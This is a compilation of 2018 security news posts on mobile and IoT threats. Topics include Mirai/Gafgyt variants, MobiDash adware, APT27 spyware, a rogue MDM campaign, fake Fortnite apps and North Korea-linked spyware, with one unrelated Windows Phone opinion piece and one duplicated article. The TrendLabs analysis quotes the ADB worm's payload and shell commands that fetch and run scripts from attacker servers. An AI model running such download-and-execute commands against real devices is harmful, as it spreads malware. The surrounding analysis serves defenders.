The post Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency appeared first on Security Affairs.

Experts warn of new campaigns leveraging Mirai and Gafgyt variants

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.

Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online many variants emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 had its source code was leaked in early 2015.

In September 2016, a joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by PaloAlto Network. 

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include the code to target the D-Link DSL-2750B OS Command Injection flaw, experts noticed that the new feature was implemented only a few weeks after the publication of the Metasploit module for its exploitation on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot that is one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits such the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei router tracked as CVE-2017–17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by PaloAlto.

The campaign leverages two different encryption schemes, the bot propagates only via exploits and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The last variant of Mirai uses the IP 213[.]183.53.120 for both for serving payloads and as a Command and Control (C2) server, the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers was using the same exploits of the previous one but also attempted to carry on credential brute force attacks.

The campaign was tracked as Okane by the name of the binaries downloaded by the shell script to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis. 

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”

mirai okane

Experts at PaloAlto Networks observed a third campaign, tracked as Hakai, that was attempting to infect devices with the Gafgyt malware by using all the previous exploits code, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs are included in the post published by PaloAlto.

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Experts warn of new campaigns leveraging Mirai and Gafgyt variants appeared first on Security Affairs.

Mobile Menace Monday: Adware MobiDash gets stealthy

The Adware known as MobiDash, detected by Malwarebytes for Android as Android/Adware.MobiDash, is far from a new. However, this ad-displaying nuisance now comes with some additional stealth features.

First appearing last spring, these new features are not limited to a single variant of MobiDash. Instead, the correlation among these stealth versions lays within the package name com.veniosg.dir.android. As a result, these stealth features hide the existence of Adware MobiDash—even when it’s in plain sight!

Look closer

When I first came upon this stealthy MobiDash, a customer was having a terrible time removing the adware from their mobile device. Malwarebytes for Android was unable to remove it, due to it being an active device administrator.

As by design by the Android Operating System, any app given device administrator privileges cannot be uninstalled until first being removed from the device administrator’s list. Attempting to uninstall an app with device administrator rights will display the screen shown above. The screen displays a warning about not being able to uninstall, and provides a link to the device administrator’s list.

Okay, simple enough, just remove the offending piece of adware from the list and uninstall, right?  Well, what if it doesn’t exist in the device administrator’s list!? Have a look for yourself below.

There’s “Find My Device” and “Malwarebytes,” both with legitimate reasons to be in the device administrator’s list. But there’s no adware app in sight.

But wait. Look a little closer.

That blank line right at the bottom of list—bingo! If you didn’t see it at first, you’re not alone.

Even more stealth

After removing Adware MobiDash from the device administrator’s list, now that you see it, the next step is uninstalling. By far, the easiest method to uninstall this tricky adware is to rescan with Malwarebytes for Android. This method assists with easily uninstalling. Removing manually can also be done, albeit it’s a bit trickier.

Manual removal

Depending on your mobile device’s Android OS version, there may be a shortcut icon disguising itself as Settings.

If this exists alongside with the real Settings icon, simply drag the fake Settings icon to Uninstall.

However, there are many cases where this icon doesn’t exist. Thus, it must be removed via the mobile device’s App List: Settings > AppsScroll all the way to the bottom of list, and you’ll discover a blank entry at the very end.

Click on it, and you can uninstall from the app info screen.

The how and why

So how, exactly, can this stealth Adware MobiDash version get device administrator rights? Well, it must be given the rights manually by the user. It’s surprisingly easy for a user to mistakenly do so, and even easier with this piece of adware. Why? Because usually giving an app device administrator rights comes with a list of scary operations to allow. This MobiDash version doesn’t ask for any, as shown below.

So why did it even bother tricking users into activating device administrator if there are no operations to allow? As highlighted above, it makes uninstalling way more tedious—especially with the extra stealth features.

It happens

I could preach about not activating device administrator to unknown apps, but instead I’ll just say, “It happens.” On Android, there are an abundance of features you must allow to get legitimate apps to work properly. This sometimes exhausts users to the point of just blindly allowing everything. It’s no wonder that the bad apps can slip under the radar.

Luckily in this case, the outcome is simply annoying ads and nothing worse. But if you don’t want to deal with the hassle of an adware infection, slowing down and being a little more vigilant can save you time in the long run. Stay safe out there!

The post Mobile Menace Monday: Adware MobiDash gets stealthy appeared first on Malwarebytes Labs.

TrendLabs Security Intelligence Blog: Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices

by Hubert Lin, Lorin Wu, and Vit Sembera

The exploitation of open ports on devices has been an on-going problem for many IoT users. TCP port 5555, in particular, has had issues in the past due to product manufacturers leaving it open before shipping, which potentially exposes users to attackers.

Recently, we found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. In this scenario, the activity involves the command line utility called Android Debug Bridge (ADB), a part of the Android SDK that handles communication between devices that also allows developers to run and debug apps on Android devices. Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.

 Figure 1. Activity in the TCP Port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15

Figure 1. Activity in the TCP Port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15

Technical Analysis

From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary.

It attacks ADB by uploading the payload via TCP port 5555:

  • “CNXN”,0,0,0,1,0,0×10,0,0,7,0,0,0,”2″,2,0,0,0xBC,0xB1,0xA7,0xB1,”host::”

Once it’s dropped into a device, the payload will delete itself from the disk and renamed with a randomly selected name with an architecture string attached.

The payload will download the shell script, which is removed after execution:

  • “OPENX”,2,0,0,0,0,0,0,0xF2,0x17,”J”,0,0,0xB0,0xAF,0xBA,0xB1,”shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2″

The shell script for the July 9 activity can be seen below:

  • cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs

 Figure 3. ASCII and hex view of the malicious payload from the July 9 activity

Figure 3. ASCII and hex view of the malicious payload from the July 9 activity

In contrast, the payload for the July 15 activity downloads two scripts instead: the earlier “adbs” and a new script called“adbs2”. As before, it will remove them after execution:

  • cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2

 Figure 4. ASCII and hex view of the malicious payload from the July 15 activity

Figure 4. ASCII and hex view of the malicious payload from the July 15 activity

The scripts download the next stage binary for several architectures and launch the corresponding one. They both do the same thing but use different download methods. The first one uses curl and the second one wget built in BusyBox. An example of the wget version can be seen below:

 Figure 5. Code of the binary that was downloaded via wget

Figure 5. Code of the binary that was downloaded via wget

The binary starts by deleting its own binary file from a filesystem. It then checks if its own name is “./.f” with the parameter “yItDitb2HvayJvNc.” If this turns out positive, it will use a hostname “n[.]ukrainianhorseriding[.]com” to resolve the address of the C&C server through the Google DNS server. Otherwise, it uses the hardwired IP address 95[.]215[.]62[.]169 with a connection port of 7267.

It will then close all three stdio streams and get its own IP address, followed by the launch of two child processes.

The first one scans /proc/[pid]/maps memory-mapped regions of all running processes on the system for open temporary files smi, xig or trinity. If found, it kills the corresponding process.  Trinity could be related to the Android system fuzzer, while smi is a known file belonging to the CoinHive script that mines Monero on hijacked Amazon devices.

The second child process is responsible for spreading the malware as a worm.

The main binary continues by writing all three pids mentioned earlier in binary form to one of the following locations:

 Figure 6. Locations where the pids are written

Figure 6. Locations where the pids are written

The binary then opens a connection to the C&C server:

 Figure 7. Communicating with the C&C server

Figure 7. Communicating with the C&C server

It then sends a specially crafted message to the C&C server. Its length is 71 bytes and looks as follows:

“WWau14TJ8IapVXrrlFq0q5sxB”, “\x00 80 00 5A 00 57 00 C8 00 F0 00 1E 00 00” and appended architecture string i.e. “arm7” in 32 bytes array.

C2 then sends to the victim

2 bytes number (x)

Interpretation is following:

if x == 505: receive next 2 bytes from C2

if x == 0xDD99: kill children and exit

if x > 1024: close connection and sleep(10)

else:

receive x bytes from C2 (they are not used, maybe this version is not finishet yet)

receive new x

recv payload containing attacking target list of len x bytes

Each six communication cycles, the victim responds with a 6-byte sequence (9, 3, 2, 5, 8, 1).

This payload contains a header with the number of targets and IP packet types to be sent, followed by a list of target IPv4 addresses that are modified by an infected host with a randomly generated offset. Up next are port numbers and sleep times before it waits for a continuation and a random payload length. The malware then sends crafted IP packets with a randomly generated payload to the obtained attack list — possibly as part of a DDoS attack.

The crafted IP packets consist of the following:

  • UDP with a randomly generated payload of random length
  • TCP SYN packet with a random payload of random length
  • TCP ACK with a random payload of random length
  • UDP with random payload tunneled through Generic Routing Encapsulation (GRE)
  • TCP SYN, after which it will send TCP ACK and ensure that the TCP window size, source port, seq_number and IP identification is consistent with the previous session. There is a three-second wait period between each packet.

An intriguing aspect of the downloaded binaries is that the C&C server 95[.]215[.]62[.]169 was found by researchers to be linked to the Satori variant of the Mirai botnet. Delving into the GeoIP information of the two IP addresses involved in the activity reveal that they are located in Europe; Spain for 95[.]215[.]62[.]169 and the Netherlands for 185[.]62[.]189[.]149.

It’s reasonable to believe that the same author was behind this sample and Satori. The important and identifiable strings are encrypted using a simple XOR method (see the encrypted string example in Figure 8). Interestingly, this malware version uses less a sophisticated string encryption method compared to older samples, which used a combination of byte swap and Base62 encoding.

 Figure 8. Strings encrypted with XOR method

Figure 8. Strings encrypted with XOR method

Their decrypted values can be seen in the figure below. Note that not all of them are used yet.

 Figure 9. String values after decryption

Figure 9. String values after decryption

As mentioned earlier, the worm function and seeking of other potential targets might mean that the two spikes in activities we detected might be a prelude to another attack that might cause more damage. Perhaps in this instance, the threat actors were testing the effectiveness of their tools and tactics to prepare for a more serious attack.

The C&C domain name information shows the same registration e-mail as another C&C server on the domain rippr[.]cc, which was already shut down:

 Figure 10. Information on the C&C domain

Figure 10. Information on the C&C domain

According to data from Shodan, over 48,000 IoT systems are vulnerable to ADB exploitations. Not all vulnerable systems are exposed as they are usually hidden behind routers with Network Address Translation (NAT). However, due to misconfiguration, they can be made accessible either manually or via UPnP NAT traversal. All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength.

Mitigation and Trend Micro Solutions

Users who are comfortable changing the settings of their mobile device can go to settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off. The latter setting is turned off by default but should be double-checked to make sure. If the user suspects that their device is already infected, doing a factory reset can clear the payload.

As a general rule, mobile device users should regularly update their devices to the latest version. Not only do these updates improve the functionality of their devices, but they also address vulnerabilities that attackers can exploit.

Security software designed to combat these kinds of threats are also an option. For example, Trend Micro Smart Home Network™ protects users from this threat via the following intrusion prevention rules:

  • 1134867 EXPLOIT Remote Command Execution via Android Debug Bridge

Indicators of Compromise (IoCs):

Detected as UNIX_MIRAI.DLDS

  • 79d55852af173612562718544ecdc569b0b8e0094647d609040f8fcc67112cba
  • 144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43

Detected as ELF_MIRAI.LBOUG

  • 2815ab8fe6d48982540524c6ac55e1df3a77a2e90c32114fde05bdc3bb353bea
  • 144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43
  • 01eca0d68cc8c2d7ad6aa8021852b57a04b8a4ca7d13e164095b29fd06a1ed9f
  • 4c3983040b2c72e4df9742c1314dcf8cd703805ab6aaa9185324b70fd530746e

Additional analysis and insights from Chunbo Song and Tim Yeh

The post Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices appeared first on .



TrendLabs Security Intelligence Blog

Security Affairs: CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.

A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.

APT27 syria

 

The folder was found on a compromised website at the following URL:

hxxp://chatsecurelite.uk[.]to

This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area, the researchers discovered that it was part or the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group focused its activity in Syria in the last couple of years, it used both Windows and Android malware to compromise target devices. Its code was not so sophisticated, anyway, the activity of the group is still ongoing.

Searching online we have found only one team of researchers that tracked the activity of the APT27 group in Syria since 2016, it was a group of researchers at 360 Threat Intelligence Center.

The analysis published by the team revealed the activity of the APT27 in Syria, the code analyzed by malware analysts at Zlab at CSE Cybsec and the one dissected by 360 Threat Intelligence Center is quite identical.

The 360 Threat Intelligence Center is dated 2017, the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf

 

Pierluigi Paganini

(Security Affairs – APT27, Syria)

The post CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing appeared first on Security Affairs.



Security Affairs

CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.

A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.

APT27 syria

 

The folder was found on a compromised website at the following URL:

hxxp://chatsecurelite.uk[.]to

This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area, the researchers discovered that it was part or the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group focused its activity in Syria in the last couple of years, it used both Windows and Android malware to compromise target devices. Its code was not so sophisticated, anyway, the activity of the group is still ongoing.

Searching online we have found only one team of researchers that tracked the activity of the APT27 group in Syria since 2016, it was a group of researchers at 360 Threat Intelligence Center.

The analysis published by the team revealed the activity of the APT27 in Syria, the code analyzed by malware analysts at Zlab at CSE Cybsec and the one dissected by 360 Threat Intelligence Center is quite identical.

The 360 Threat Intelligence Center is dated 2017, the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf

 

Pierluigi Paganini

(Security Affairs – APT27, Syria)

The post CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing appeared first on Security Affairs.

Automated money-laundering scheme found in free-to-play games

The scammers automatically created iOS accounts with valid email accounts, then automatically used stolen cards to buy and resell stuff.

Protecting a Mobile Workforce with Hybrid DNS Security

It is expected that half of the UK’s workforce will be working remotely by 2020, accessing the corporate network via mobile devices and the cloud. If true, this prediction is likely to

The post Protecting a Mobile Workforce with Hybrid DNS Security appeared first on The Cyber Security Place.

Radware Blog: The Evolving Network Security Environment – Can You Protect Your Customers in a 5G Universe?

Smart Farming depends on internet of things (IoT) devices and sensors to monitor vast farm fields, guiding farmers’ decisions about crop management through rich data. But it only takes one security flaw for all stakeholders within the ecosystem to be impacted. If hackers gain access to a single sensor, they can navigate their way to […]

The post The Evolving Network Security Environment – Can You Protect Your Customers in a 5G Universe? appeared first on Radware Blog.



Radware Blog

Windows Phone Lives on in Android

For a little less than a year now year now, I have been using a Samsung smartphone for both work and play. Having owned a Windows Phone for nearly a decade, and happily so I might add, I was forced to migrate to one of two platforms—Apple or Android. Being the practical fellow that I am, I chose the Android route with little consideration for Apple, and for good reason.

After all, in my opinion, Apple seems to have a long history of gouging its customers similar to Disney, but I digress. People buy Apple stuff mainly for its cachet. It’s like a piece of jewelry. I get it. Just like most jewelry, it’s often way overpriced and not entirely functional. Yes, I will admit, I’ve never been much of an Apple fan, much less one of Steve Jobs. But Apple’s products are simply overpriced, and until recently, didn’t even include the latest technology.

Now, back to the good old Windows Phone. You know, that seemingly ephemeral blip on the radar screen of smartphones that no one had ever heard of, much less purchased, here in the United States. Interestingly, the device was wildly popular in some European countries, but not here in the U.S. in part because of the ferocious onslaught of anti-Microsoft trolls, or more specifically, Apple and Android stalwarts. They did nothing but trash talk the device constantly. I witnessed it firsthand being a Windows Phone fan.

The anti-Redmond giant types simply did not want the device to succeed and here’s why; First, Microsoft at the time was perceived as the anti-Christ in the tech industry, due to its hold on proprietary technology patents and the emergence of the open source software movement. Secondly, it had previously been chastised in U.S. courts for anti-trust behavior regarding the bundling of Windows and its web browser Internet Explorer. The public eventually soured on Microsoft and its technology and for quite some time, enough to essentially kill off any interest by developers and consumers in Windows Phone.

But that’s all history now. The de facto titans or leaders of the smartphone industry are Samsung and Apple. Pure and simple, it’s now a duopoly between the two. Windows Phone was a distant third, but it is all but dead now. Sans a select few of hangers-on that are hoping for Microsoft to release a new smartphone to replace it, mainly in the form of a Surface smartphone, it looks like it’s curtains for the device. And based on the latest soothsayers in the media, that idea has now indeed been shelved or put to rest by Microsoft.

So what options do Windows Phone fans have now? Fortunately, they now have two courses of action and maybe three, if and only if, Microsoft releases a Surface smartphone. The first foundational replacement examples are Android based smartphones from Samsung, otherwise known as the Galaxy series. They are robust and highly customizable, unlike Apple’s smartphones, particularly the home screens. The other option is Apple, but for many Windows Phone fans it's a non-starter. The iPhone's price and lack of customization would most likely deter them.       

Windows Phone Emulators for Android abound in Google Play, but one stands out among them all—Launcher 10. This formidable app allows Android users to completely replace their home screen with the Windows Phone UI or Live Tiles, and then some. In fact, the app actually outperforms the original UI with ultra-customizable features. Take my word for it Windows Phone fans, you’ll love it—if you can get yourself to switch to Android. It’s a big jump, I know, but it’s not as bad as it seems. In fact, the user experience is nearly imperceptible between the two phone platforms or devices (i.e. the Windows Phone and Android smartphone) once it is installed.

The only caveat I might add is that Google tracks your every move on Android based devices, otherwise known as “surveillance capitalism”. Tracking is turned on by default, but Google claims it can be turned off, albeit via a time consuming process.

The second-best choice for former Windows Phone users on Android is Microsoft Launcher. This cool little app by Microsoft essentially allows you to replace most of Google’s crappy stock apps that come on Samsung devices with their own, sans Contacts, and of course, the Phone or Call app. Unfortunately, their replacement for Samsung’s or Android’s stock home screen looks nothing like Live Tiles, but it does load all your favorite Microsoft apps like Outlook, OneDrive, Word and Excel effortlessly in one quick install.

Finally, my suggestion for Windows Phone fans is to install both apps should you choose to go the Android route. Specifically, install Microsoft Launcher first to replace your Google Apps, including the enabling of your phone to automatically save any photos you take on the phone to Microsoft OneDrive. Then, install Launcher 10 to replace Microsoft Launcher’s home screen with Live Tiles emulation app, Launcher 10.

After that, I guarantee you’ll be back in Windows Phone heaven, Windows Phone fans. You know, that beautiful smartphone interface that ran circles around anything Google or Apple ever came up with.

Enjoy!

 

Mobile Malware Campaign targets users in India through rogue MDM service

Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware distributed through a bogus MDM service

Security experts from Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware that has been active at least since August 2015. The researchers believe that cyberspies are operating from China and they found spying on 13 selected iPhones in the same country.

Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.

The access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware and the targeted devices.

bogus MDM service

“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.

“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register”

hack-iphone-using-mdm-server

To enroll an iOS device into the MDM service requires a user to manually install enterprise development certificate. Enterprises can obtain such kind of certificates through the Apple Developer Enterprise Program.

Enterprise can deliver MDM configuration file through email or a webpage for over-the-air enrollment service using the Apple Configurator.

“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.

Cisco’s Talos experts believe that attackers used either social engineering techniques, such as a fake tech support-style call or gaining in some way a physical access to the targeted devices.

The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code to legitimate apps, including the messaging apps WhatsApp and Telegram that were then deployed through the MDM service onto the 13 targeted devices in India.

The BOptions sideloading technique allowed the attacker to inject a dynamic library in the application that implements spyware capabilities. The malicious code allows that attacker of collecting and exfiltrating information from the targeted device, including the phone number, serial number, location, contacts, user’s photos, SMS and Telegram and WhatsApp chat messages.

It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.

Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com

Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.

“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.

“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”

Talos was not able to attribute the attack to a specific actor either which are its motivations, they were only able to find evidence suggesting the attackers were operating from India. Experts noticed that attackers planted a “false flag” by posing as a Russian threat actor.

“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.

Talos shared its findings with Apple that quickly revoked 3 certificates used in this campaign.

Further details, including IoCs are reported in the analysis shared by Talos.

Pierluigi Paganini

(Security Affairs – MDM service, India)

The post Mobile Malware Campaign targets users in India through rogue MDM service appeared first on Security Affairs.

Apple’s new USB security feature has a major loophole

Apple's new USB Restricted Mode, which dropped with the iOS 11.4.1 release yesterday, may not be as secure as previously thought. The feature is designed to protect iPhones against USB devices used by law enforcement to crack your passcode, and works by disabling USB access after the phone has been locked for an hour. Computer security company ElcomSoft, however, has found a loophole.

Source: ElcomSoft

Smashing Security #084: No! My voice is not my password

Smashing Security #084: No! My voice is not my password

Who’s been collecting the voice prints of millions of people saying “My voice is my password”? Why has it become tougher for law enforcement to scoop up cellphone data? And who’s been turning up your central heating?

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes from AMTSO.

Security researcher bypasses iPhone’s limit on passcode attempts (updated)

It's not easy breaking into a locked iPhone. Try too many times and you can get locked out for years, even decades, or lose the device's data altogether. That's why law enforcement had to put pressure on Apple to unlock the San Bernardino shooter's iPhone, and why cops across the country are buying an affordable iPhone cracker called GrayKey. Hacker House cybersecurity firm co-founder Matthew Hickey, however, has discovered a way to bypass the device's security measures, even if it's running the latest version of Apple's mobile platform. Apparently, a hacker will only need "a turned on, locked phone and a Lightning cable."

Update: An Apple spokesperson has reached out and told us its devices have no vulnerability: "The recent report about a passcode bypass on iPhone was in error, and a result of incorrect testing."

Source: ZDNet, Matthew Hickey

Fake Fortnite for Android links found on YouTube

The extremely popular video game Fortnite is coming to Android sometime this summer, and the fanbase is going wild. Not surprisingly, mobile malware developers are taking advantage. Already, there are several videos on YouTube with links claiming to be versions of Fortnite for Android, despite the fact the game has yet to be released on this platform.

Swati Khandelwal of The Hacker News highlights the emerging threat in her article, Epic Games Fortnite for Android–APK Downloads Leads to Malware. Taking it a step further, I grabbed some of these malicious apps and took them for a spin.

The source of infection

The apps are not located on the Google Play Store. Instead, people have found them by searching “How to install Fortnite on Android” or “Fortnite for Android” in Google, or stumbling across links in YouTube ads. From there, the apps can be downloaded.

My findings for the so-called Fortnite for Android app are that it’s a simple program that comes in two different package names (so far):

com.anizz14

com.anizz14.fortnite

Simple, but malicious nonetheless

To make the app look legit, it starts with a realistic-looking icon. As a matter of fact, it’s so realistic that some may recognize it from the Apple iOS version. By stealing the icon directly from Apple, how could it not look real?

When opening the app, it displays the Epic Games logo to further trick users.

Next, once again stealing from iOS, a loading screen appears.

iOS stolen loading screen

iOS stolen loading screen

After the loading screen, it starts playing the Fortnite intro song and opens a screen that displays “New Updates,” the first indication something might be up.

By just clicking on the screen, it moves onto a different screen that makes more sense. It states that it’s “Logging In…” and looks very authentic (as well as very stolen).

The next screen is where things go sideways. It requires a Mobile Verification.

Click “OK” and the app redirects to a website via your default browser. There, it claims to be for the purpose of verifying “You’r Not A BOT” (bad grammar and all) in order to proceed to Fortnite. To “verify,” the user must complete a task, which involves downloading another “free” app.

Click to view slideshow.

Click on a link and a pop-up promising “Unlock Instructions” appears.

Press “Tap to Install” and it redirects you to Google Play—that’s right, a bit of silver lining.  The redirect is at least to a legit, safe Google Play version of an app.

The bad news is that no matter how many apps you download, the game never unlocks—because it never existed within the malicious app in first place.

Yep, I know this game

The scheme goes like this: Get a couple of over-excited people salivating for a chance to play Fortnite on Android, and get paid. The more downloads that come from the website shown above, the more money the malware developers can make. With the app being so simplistic, the amount of development effort is pretty low for the amount that could be potentially gained. Hopefully, we can help stop the revenue stream by detecting this one as Android/Trojan.FakeFortnite.

Patience is a virtue

Every time there is craze around a new video game release, consequently we see malware authors jumping into the game. Often, it’s an attack against our good senses. They capitalize on that little itch that screams “I want it now!” We suggest listening to that other inner voice that warns, “This seems too good to be true.” Our advice: be patient. If you wait for the official release by Epic Games in the Google Play Store this summer, you won’t have the spend the ensuing months cleaning malware off your Android. Stay safe out there!

The post Fake Fortnite for Android links found on YouTube appeared first on Malwarebytes Labs.

Malware on Google Play Targets North Korean Defectors

Earlier this year, McAfee researchers predicted in the McAfee Mobile Threat Report that we expect the number of targeted attacks on mobile devices to increase due to their ubiquitous growth combined with the sophisticated tactics used by malware authors. Last year we posted the first public blog about the Lazarus group operating in the mobile landscape. Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.

RedDawn is the second campaign we have seen this year from the “Sun Team” hacking group. In January, the McAfee Mobile Research Team wrote about Android malware targeting North Korean defectors and journalists. McAfee researchers recently found new malware developed by the same actors that was uploaded on Google Play as “unreleased” versions. We notified both Google, which has removed the malware from Google Play, and the Korea Internet & Security Agency.

Our findings indicate that the Sun Team is still actively trying to implant spyware on Korean victims’ devices. (The number of North Korean defectors who came to South Korea exceeded 30,000 in 2016, according to Radio Free Asia.) Once the malware is installed, it copies sensitive information including personal photos, contacts, and SMS messages and sends them to the threat actors. We have seen no public reports of infections. We identified these malwares at an early stage; the number of infections is quite low compared with previous campaigns, about 100 infections from Google Play.

Malware on Google Play

Malware uploaded on Google Play (now deleted).

We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack. The first app in this attack, 음식궁합 (Food Ingredients Info), offers information about food; the other two apps, Fast AppLock and AppLockFree, are security related. 음식궁합 and Fast AppLock secretly steal device information and receive commands and additional executable (.dex) files from a cloud control server. We believe that these apps are multi-staged, with several components. AppLockFree is part of the reconnaissance stage we believe, setting the foundation for the next stage unlike the other two apps. The malwares were spread to friends, asking them to install the apps and offer feedback via a Facebook account with a fake profile promoted 음식궁합.

Links to Previous Operations

After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks. From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January. The logs had a similar format and used the same abbreviations for fields as in other Sun Team logs. Further, the email addresses of the new malware’s developer are identical to the earlier email addresses associated with the Sun Team. The relationship among email addresses and test devices is explained in the following diagram.

The use of identical email addresses ties the two malware campaigns to the same attacker.

About the Actors

After tracking Sun Team’s operations, we were able to uncover different versions of their malware. Following diagram shows the timeline of the versions.

Timeline of different malware versions of Sun Team.

Timeline shows us that malwares became active in 2017. Sun Team’s only purpose is to extract information from devices as all of the malwares are spywares. Malwares on Google Play stayed online for about 2 months before being deleted.

